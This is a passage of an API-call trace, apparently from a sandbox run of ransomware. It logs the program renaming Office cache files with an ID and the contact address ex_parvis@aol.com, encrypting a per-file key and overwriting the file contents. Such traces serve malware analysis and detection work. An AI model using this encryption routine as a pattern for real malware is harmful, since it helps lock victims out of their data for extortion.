	[0075.153] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.153] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0075.153] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0075.153] GetProcessHeap () returned 0x540000
	[0075.153] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db628
	[0075.153] lstrcpyW (in: lpString1=0x5db628, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0075.154] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.154] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.157] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470
	[0075.157] GetProcessHeap () returned 0x540000
	[0075.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db628 | out: hHeap=0x540000) returned 1
	[0075.157] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=5884) returned 1
	[0075.157] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x16fc
	[0075.157] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.157] GetProcessHeap () returned 0x540000
	[0075.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.157] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.157] WriteFile (in: hFile=0x470, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.159] WriteFile (in: hFile=0x470, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.159] WriteFile (in: hFile=0x470, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.159] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x16fc) returned 0x5db628
	[0075.159] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x16fc) returned 0x5dcd30
	[0075.159] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.159] ReadFile (in: hFile=0x470, lpBuffer=0x5db628, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db628*, lpNumberOfBytesRead=0x3a1f778*=0x16fc, lpOverlapped=0x0) returned 1
	[0075.160] SetFilePointer (in: hFile=0x470, lDistanceToMove=-5884, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.160] WriteFile (in: hFile=0x470, lpBuffer=0x5dcd30*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dcd30*, lpNumberOfBytesWritten=0x3a1f778*=0x16fc, lpOverlapped=0x0) returned 1
	[0075.160] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db628 | out: hHeap=0x540000) returned 1
	[0075.160] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dcd30 | out: hHeap=0x540000) returned 1
	[0075.160] CloseHandle (hObject=0x470) returned 1
	[0075.161] GetProcessHeap () returned 0x540000
	[0075.161] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.161] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.161] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.161] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db580 | out: hHeap=0x540000) returned 1
	[0075.161] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4d8 | out: hHeap=0x540000) returned 1
	[0075.161] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db4d8
	[0075.161] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.161] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.161] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.161] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.161] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", dwFileAttributes=0x80) returned 1
	[0075.161] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 76
	[0075.161] GetProcessHeap () returned 0x540000
	[0075.161] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0075.161] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml"
	[0075.161] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.161] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.164] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470
	[0075.164] GetProcessHeap () returned 0x540000
	[0075.164] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.164] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=811) returned 1
	[0075.164] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x32b
	[0075.164] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.164] GetProcessHeap () returned 0x540000
	[0075.164] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.164] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.164] WriteFile (in: hFile=0x470, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.166] WriteFile (in: hFile=0x470, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.166] WriteFile (in: hFile=0x470, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.166] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x32b) returned 0x5db580
	[0075.166] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x32b) returned 0x5db8b8
	[0075.166] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.166] ReadFile (in: hFile=0x470, lpBuffer=0x5db580, nNumberOfBytesToRead=0x32b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db580*, lpNumberOfBytesRead=0x3a1f778*=0x32b, lpOverlapped=0x0) returned 1
	[0075.166] SetFilePointer (in: hFile=0x470, lDistanceToMove=-811, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.166] WriteFile (in: hFile=0x470, lpBuffer=0x5db8b8*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db8b8*, lpNumberOfBytesWritten=0x3a1f778*=0x32b, lpOverlapped=0x0) returned 1
	[0075.166] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db580 | out: hHeap=0x540000) returned 1
	[0075.166] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db8b8 | out: hHeap=0x540000) returned 1
	[0075.166] CloseHandle (hObject=0x470) returned 1
	[0075.167] GetProcessHeap () returned 0x540000
	[0075.167] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.167] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.167] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.167] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4d8 | out: hHeap=0x540000) returned 1
	[0075.167] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db430 | out: hHeap=0x540000) returned 1
	[0075.167] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db430
	[0075.167] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.167] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.167] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.167] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.167] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", dwFileAttributes=0x80) returned 1
	[0075.168] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 76
	[0075.168] GetProcessHeap () returned 0x540000
	[0075.168] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0075.168] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi"
	[0075.168] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.168] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.173] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470
	[0075.173] GetProcessHeap () returned 0x540000
	[0075.173] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.173] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=868864) returned 1
	[0075.173] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd4200
	[0075.173] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.173] GetProcessHeap () returned 0x540000
	[0075.173] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.173] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.173] WriteFile (in: hFile=0x470, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.175] WriteFile (in: hFile=0x470, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.175] WriteFile (in: hFile=0x470, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.175] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4200) returned 0x3790020
	[0075.175] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4200) returned 0x3a20020
	[0075.175] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.175] ReadFile (in: hFile=0x470, lpBuffer=0x3790020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790020*, lpNumberOfBytesRead=0x3a1f778*=0xd4200, lpOverlapped=0x0) returned 1
	[0075.207] SetFilePointer (in: hFile=0x470, lDistanceToMove=-868864, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.207] WriteFile (in: hFile=0x470, lpBuffer=0x3a20020*, nNumberOfBytesToWrite=0xd4200, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesWritten=0x3a1f778*=0xd4200, lpOverlapped=0x0) returned 1
	[0075.209] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790020 | out: hHeap=0x540000) returned 1
	[0075.213] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20020 | out: hHeap=0x540000) returned 1
	[0075.217] CloseHandle (hObject=0x470) returned 1
	[0075.222] GetProcessHeap () returned 0x540000
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db430 | out: hHeap=0x540000) returned 1
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0075.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5db388
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db1a0 | out: hHeap=0x540000) returned 1
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589118 | out: hHeap=0x540000) returned 1
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5850 | out: hHeap=0x540000) returned 1
	[0075.222] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e9f7d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e9f7d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da1b0
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.222] GetLastError () returned 0x0
	[0075.222] FindNextFileW (in: hFindFile=0x5da1b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e9f7d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e9f7d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0075.222] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.222] GetLastError () returned 0x0
	[0075.223] FindNextFileW (in: hFindFile=0x5da1b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.223] GetLastError () returned 0x0
	[0075.223] FindNextFileW (in: hFindFile=0x5da1b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.223] GetLastError () returned 0x0
	[0075.223] FindNextFileW (in: hFindFile=0x5da1b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.223] GetLastError () returned 0x0
	[0075.223] FindNextFileW (in: hFindFile=0x5da1b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0075.223] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.223] GetLastError () returned 0x0
